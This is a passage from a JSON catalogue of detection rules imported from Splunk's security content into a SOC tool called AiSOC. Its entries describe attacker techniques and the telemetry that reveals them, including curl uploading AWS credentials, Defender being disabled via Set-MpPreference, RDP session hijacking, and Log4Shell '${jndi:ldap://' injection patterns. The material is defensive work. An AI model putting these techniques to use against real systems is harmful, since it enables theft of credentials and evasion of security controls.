significant because adversaries can use `plutil` to alter plist files, potentially adding malicious binaries or command-line arguments that execute upon user logon or system startup. 
If confirmed malicious, this could allow attackers to achieve persistence, execute arbitrary code, or escalate privileges, posing a significant threat to the system's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1647" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-plutil.yaml", "provenance": { "source": "splunk/security_content", "source_id": "c11f2b57-92c1-4cd2-b46c-064eafb833ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_plutil.yml" } }, { "id": "splunk-security-content-c137bfe8-6036-4cff-b77b-4e327dd0a1cf", "type": "detection", "name": "Windows Proxy Via Netsh", "description": "The following analytic identifies the use of netsh.exe to configure a connection proxy, which can be leveraged for persistence by executing a helper DLL. It detects this activity by analyzing process creation events from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"portproxy\" and \"v4tov4\" parameters. This activity is significant because it indicates potential unauthorized network configuration changes, which could be used to maintain persistence or redirect network traffic. 
If confirmed malicious, this could allow an attacker to maintain covert access or manipulate network communications, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-proxy-via-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c137bfe8-6036-4cff-b77b-4e327dd0a1cf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_proxy_via_netsh.yml" } }, { "id": "splunk-security-content-c13b3d74-6b63-4db5-a841-4206f0370077", "type": "detection", "name": "Windows Service Create with Tscon", "description": "The following analytic detects potential RDP Hijacking attempts by identifying the creation of a Windows service using sc.exe with a binary path that includes tscon.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant as it indicates an attacker may be trying to hijack a disconnected RDP session, posing a risk of unauthorized access. 
If confirmed malicious, the attacker could gain control over an existing user session, leading to potential data theft or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-create-with-tscon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c13b3d74-6b63-4db5-a841-4206f0370077", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_create_with_tscon.yml" } }, { "id": "splunk-security-content-c1400ea2-6257-11ec-ad49-acde48001122", "type": "detection", "name": "Linux Change File Owner To Root", "description": "The following analytic detects the use of the 'chown' command to change a file owner to 'root' on a Linux system. It leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring command-line executions and process details. This activity is significant as it may indicate an attempt to escalate privileges by adversaries, malware, or red teamers. 
If confirmed malicious, this action could allow an attacker to gain root-level access, leading to full control over the compromised host and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-change-file-owner-to-root.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1400ea2-6257-11ec-ad49-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_change_file_owner_to_root.yml" } }, { "id": "splunk-security-content-c148a894-dd93-11eb-bf2a-acde48001122", "type": "detection", "name": "Powershell Disable Security Monitoring", "description": "The following analytic identifies attempts to disable Windows Defender\nreal-time behavior monitoring via PowerShell commands. It detects the use of specific\n`Set-MpPreference` parameters that disable various security features. This activity\nis significant as it is commonly used by malware such as RATs, bots, or Trojans\nto evade detection by disabling antivirus protections. 
If confirmed malicious, this\naction could allow an attacker to operate undetected, leading to potential data\nexfiltration, further system compromise, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-disable-security-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c148a894-dd93-11eb-bf2a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_disable_security_monitoring.yml" } }, { "id": "splunk-security-content-c16c4899-d3f7-461b-92c2-cc0ef5758855", "type": "detection", "name": "Cisco Isovalent - Curl Execution With Insecure Flags", "description": "The following analytic detects the execution of curl commands with insecure flags within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for curl commands that use the -k or --insecure flags. This behavior is significant for a SOC as it could allow an attacker to bypass SSL/TLS verification, potentially exposing the Kubernetes infrastructure to man-in-the-middle attacks. 
If confirmed malicious, this activity could lead to data interception, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-curl-execution-with-insecure-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c16c4899-d3f7-461b-92c2-cc0ef5758855", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___curl_execution_with_insecure_flags.yml" } }, { "id": "splunk-security-content-c184f12e-5c90-11ec-bf1f-497c9a704a72", "type": "detection", "name": "Log4Shell JNDI Payload Injection Attempt", "description": "The following analytic identifies attempts to inject Log4Shell JNDI payloads via web calls. It leverages the Web datamodel and uses regex to detect patterns like `${jndi:ldap://` in raw web event data, including HTTP headers. This activity is significant because it targets vulnerabilities in Java web applications using Log4j, such as Apache Struts and Solr. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to full system compromise. 
Immediate investigation is required to determine if the attempt was successful and to mitigate any potential exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-jndi-payload-injection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c184f12e-5c90-11ec-bf1f-497c9a704a72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/log4shell_jndi_payload_injection_attempt.yml" } }, { "id": "splunk-security-content-c187ce2c-c88e-4cec-8a1c-607ca0dedd78", "type": "detection", "name": "Windows Multiple NTLM Null Domain Authentications", "description": "The following analytic detects when a device is the target of numerous NTLM authentications using a null domain. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device from a non-domain device. 
This activity may also generate a large number of EventID 4776 events in tandem; however, these events will not indicate the attacker or target device.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-ntlm-null-domain-authentications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c187ce2c-c88e-4cec-8a1c-607ca0dedd78", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_ntlm_null_domain_authentications.yml" } }, { "id": "splunk-security-content-c1952cf1-643c-4965-82de-11c067cbae76", "type": "detection", "name": "Linux Shred Overwrite Command", "description": "The following analytic detects the execution of the 'shred' command on a Linux machine, which is used to overwrite files to make them unrecoverable. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because the 'shred' command can be used in destructive attacks, such as those seen in the Industroyer2 malware targeting energy facilities. 
If confirmed malicious, this activity could lead to the permanent destruction of critical files, severely impacting system integrity and data availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-shred-overwrite-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1952cf1-643c-4965-82de-11c067cbae76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_shred_overwrite_command.yml" } }, { "id": "splunk-security-content-c1b7abca-55cb-4a39-bdfb-e28c1c12745f", "type": "detection", "name": "Linux Auditd Preload Hijack Via Preload File", "description": "The following analytic detects suspicious preload hijacking via the `preload` file, which may indicate an attacker's attempt to intercept or manipulate library loading processes.\nThe `preload` file can be used to force the loading of specific libraries before others, potentially allowing malicious code to execute or alter application behavior.\nBy monitoring for unusual or unauthorized modifications to the `preload` file, this analytic helps identify attempts to hijack preload mechanisms, enabling security teams to investigate and address potential threats to system integrity and security.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-preload-hijack-via-preload-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1b7abca-55cb-4a39-bdfb-e28c1c12745f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_preload_hijack_via_preload_file.yml" } }, { "id": "splunk-security-content-c1bc706a-0025-4814-ad30-288f38865036", "type": "detection", "name": "PingID Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within a PingID environment. It triggers when 10 or more MFA prompts fail within 10 minutes, using JSON logs from PingID. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. 
If confirmed malicious, this could lead to unauthorized access, as the user might eventually accept the fraudulent request, compromising the security of the account and potentially the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621", "T1078", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/pingid-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1bc706a-0025-4814-ad30-288f38865036", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/pingid_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-c1de2d9a-0c02-4bb4-a49a-510c6e9cf2bf", "type": "detection", "name": "Linux Curl Upload File", "description": "The following analytic detects the use of the curl command with specific switches (-F, --form, --upload-file, -T, -d, --data, --data-raw, -I, --head) to upload AWS credentials or configuration files to a remote destination. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to exfiltrate sensitive AWS credentials, a technique known to be used by the TeamTNT group. 
If confirmed malicious, this could lead to unauthorized access and potential compromise of AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-curl-upload-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1de2d9a-0c02-4bb4-a49a-510c6e9cf2bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_curl_upload_file.yml" } }, { "id": "splunk-security-content-c1eea697-99ed-44c2-9b70-d8935464c499", "type": "detection", "name": "Linux Hardware Addition SwapOff", "description": "The following analytic detects the execution of the \"swapoff\" command, which disables the swapping of paging devices on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because disabling swap can be a tactic used by malware, such as Awfulshred, to evade detection and hinder forensic analysis. 
If confirmed malicious, this action could allow an attacker to manipulate system memory management, potentially leading to data corruption, system instability, or evasion of memory-based detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-hardware-addition-swapoff.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1eea697-99ed-44c2-9b70-d8935464c499", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_hardware_addition_swapoff.yml" } }, { "id": "splunk-security-content-c1fb4edb-cab1-4359-9b40-925ffd797fb5", "type": "detection", "name": "Azure AD External Guest User Invited", "description": "The following analytic detects the invitation of an external guest user within Azure AD. It leverages Azure AD AuditLogs to identify events where an external user is invited, using fields such as operationName and initiatedBy. Monitoring these invitations is crucial as they can lead to unauthorized access if abused. 
If confirmed malicious, this activity could allow attackers to gain access to internal resources, potentially leading to data breaches or further exploitation of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-external-guest-user-invited.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1fb4edb-cab1-4359-9b40-925ffd797fb5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_external_guest_user_invited.yml" } }, { "id": "splunk-security-content-c23b425c-9024-4bd7-b526-c18a4a51d93e", "type": "detection", "name": "Crowdstrike Medium Identity Risk Severity", "description": "The following analytic detects CrowdStrike alerts for Medium Identity Risk Severity with a risk score of 55 or higher. These alerts indicate significant vulnerabilities in user identities, such as suspicious behavior or compromised credentials. 
Promptly investigating and addressing these alerts is crucial to prevent potential security breaches and ensure the integrity and protection of sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-medium-identity-risk-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c23b425c-9024-4bd7-b526-c18a4a51d93e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_medium_identity_risk_severity.yml" } }, { "id": "splunk-security-content-c2590137-0b08-4985-9ec5-6ae23d92f63d", "type": "detection", "name": "Set Default PowerShell Execution Policy To Unrestricted or Bypass", "description": "The following analytic detects changes to the PowerShell ExecutionPolicy in the registry to \"Unrestricted\" or \"Bypass.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications under the path *Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell*. This activity is significant because setting the ExecutionPolicy to these values can allow the execution of potentially malicious scripts without restriction. 
If confirmed malicious, this could enable an attacker to execute arbitrary code, leading to further compromise of the system and potential escalation of privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/set-default-powershell-execution-policy-to-unrestricted-or-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2590137-0b08-4985-9ec5-6ae23d92f63d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml" } }, { "id": "splunk-security-content-c2998141-235a-4e31-83cf-46afb5208a87", "type": "detection", "name": "Windows DLL Module Loaded in Temp Dir", "description": "The following analytic detects instances where a Dynamic Link Library (DLL) is loaded from a temporary directory on a Windows system. Loading DLLs from non-standard paths such as %TEMP% is uncommon for legitimate applications and is often associated with adversary tradecraft, including DLL search order hijacking, side-loading, or execution of malicious payloads staged in temporary folders. Adversaries frequently leverage these directories because they are writable by standard users and often overlooked by security controls, making them convenient locations to drop and execute malicious files. This behavior may indicate attempts to evade detection, execute unauthorized code, or maintain persistence through hijacked execution flows. 
Detection of DLL loads from %TEMP% can help surface early signs of compromise and should be investigated in the context of the originating process, user account, and potential file creation or modification activity within the same directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-module-loaded-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2998141-235a-4e31-83cf-46afb5208a87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_module_loaded_in_temp_dir.yml" } }, { "id": "splunk-security-content-c2a332c3-24a2-4e24-9455-0e80332e6746", "type": "detection", "name": "Web Remote ShellServlet Access", "description": "The following analytic identifies attempts to access the Remote ShellServlet on a web server, specifically targeting Confluence servers vulnerable to CVE-2023-22518 and CVE-2023-22515. It leverages web data to detect URLs containing \"*plugins/servlet/com.jsos.shell/*\" with a status code of 200. This activity is significant as it is commonly associated with web shells and other malicious behaviors, potentially leading to unauthorized command execution. 
If confirmed malicious, attackers could gain remote code execution capabilities, compromising the server and potentially the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-remote-shellservlet-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2a332c3-24a2-4e24-9455-0e80332e6746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_remote_shellservlet_access.yml" } }, { "id": "splunk-security-content-c3194009-e0eb-4f84-87a9-4070f8688f00", "type": "detection", "name": "Suspicious PlistBuddy Usage", "description": "The following analytic identifies the use of the native macOS utility, PlistBuddy, to create or modify property list (.plist) files. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions involving PlistBuddy. This activity is significant because PlistBuddy can be used to establish persistence by modifying LaunchAgents, as seen in the Silver Sparrow malware. 
If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, and potentially escalate privileges on the compromised macOS system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-plistbuddy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3194009-e0eb-4f84-87a9-4070f8688f00", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_plistbuddy_usage.yml" } }, { "id": "splunk-security-content-c32f091e-30db-11ec-8738-acde48001122", "type": "detection", "name": "Windows Curl Download to Suspicious Path", "description": "The following analytic detects the use of Windows Curl.exe to download\na file to a suspicious location, such as AppData, ProgramData, or Public directories.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on\ncommand-line executions that include the -O or --output options. This activity is\nsignificant because downloading files to these locations can indicate an attempt\nto bypass security controls or establish persistence. 
If confirmed malicious, this\nbehavior could lead to unauthorized code execution, data exfiltration, or further\ncompromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-curl-download-to-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c32f091e-30db-11ec-8738-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_curl_download_to_suspicious_path.yml" } }, { "id": "splunk-security-content-c32fab32-6aaf-492d-bfaf-acbed8e50cdf", "type": "detection", "name": "ProxyShell ProxyNotShell Behavior Detected", "description": "The following analytic identifies potential exploitation of Windows Exchange servers via ProxyShell or ProxyNotShell vulnerabilities, followed by post-exploitation activities such as running nltest, Cobalt Strike, Mimikatz, and adding new users. It leverages data from multiple analytic stories, requiring at least five distinct sources to trigger, thus reducing noise. This activity is significant as it indicates a high likelihood of an active compromise, potentially leading to unauthorized access, privilege escalation, and persistent threats within the environment. 
If confirmed malicious, attackers could gain control over the Exchange server, exfiltrate data, and maintain long-term access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/proxyshell-proxynotshell-behavior-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c32fab32-6aaf-492d-bfaf-acbed8e50cdf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/proxyshell_proxynotshell_behavior_detected.yml" } }, { "id": "splunk-security-content-c396a0c4-c9f2-11eb-b4f5-acde48001122", "type": "detection", "name": "Powershell Using memory As Backing Store", "description": "The following analytic detects suspicious PowerShell script execution using memory streams as a backing store, identified via EventCode 4104. It leverages PowerShell Script Block Logging to capture scripts that create new objects with memory streams, often used to decompress and execute payloads in memory. This activity is significant as it indicates potential in-memory execution of malicious code, bypassing traditional file-based detection. 
If confirmed malicious, this technique could allow attackers to execute arbitrary code, maintain persistence, or escalate privileges without leaving a trace on the disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-using-memory-as-backing-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c396a0c4-c9f2-11eb-b4f5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_using_memory_as_backing_store.yml" } }, { "id": "splunk-security-content-c3bc1430-04e7-4178-835f-047d8e6e97df", "type": "detection", "name": "Detect Regasm with no Command Line Arguments", "description": "The following analytic detects instances of regasm.exe running without command line arguments. This behavior typically indicates process injection, where another process manipulates regasm.exe. The detection leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line executions. This activity is significant as it may signal an attempt to evade detection or execute malicious code. If confirmed malicious, attackers could achieve code execution, potentially leading to privilege escalation, persistence, or access to sensitive information. 
Investigate network connections, parallel processes, and suspicious module loads for further context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3bc1430-04e7-4178-835f-047d8e6e97df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-c3be767e-7959-44c5-8976-0e9c12a91ad2", "type": "detection", "name": "Detect IPv6 Network Infrastructure Threats", "description": "The following analytic detects IPv6 network infrastructure threats by identifying suspicious activities such as IP and MAC address theft or packet drops. It leverages logs from Cisco network devices configured with First Hop Security measures like RA Guard and DHCP Guard. This activity is significant as it can indicate attempts to compromise network integrity and security. 
If confirmed malicious, attackers could manipulate network traffic, leading to potential data interception, unauthorized access, or network disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-ipv6-network-infrastructure-threats.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3be767e-7959-44c5-8976-0e9c12a91ad2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_ipv6_network_infrastructure_threats.yml" } }, { "id": "splunk-security-content-c3d22720-35d3-4da4-bd0a-740d37192bd4", "type": "detection", "name": "Okta New API Token Created", "description": "The following analytic detects the creation of a new API token within an Okta tenant. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud to identify events where the `system.api_token.create` command is executed. This activity is significant because creating a new API token can indicate potential account takeover attempts or unauthorized access, allowing an adversary to maintain persistence. 
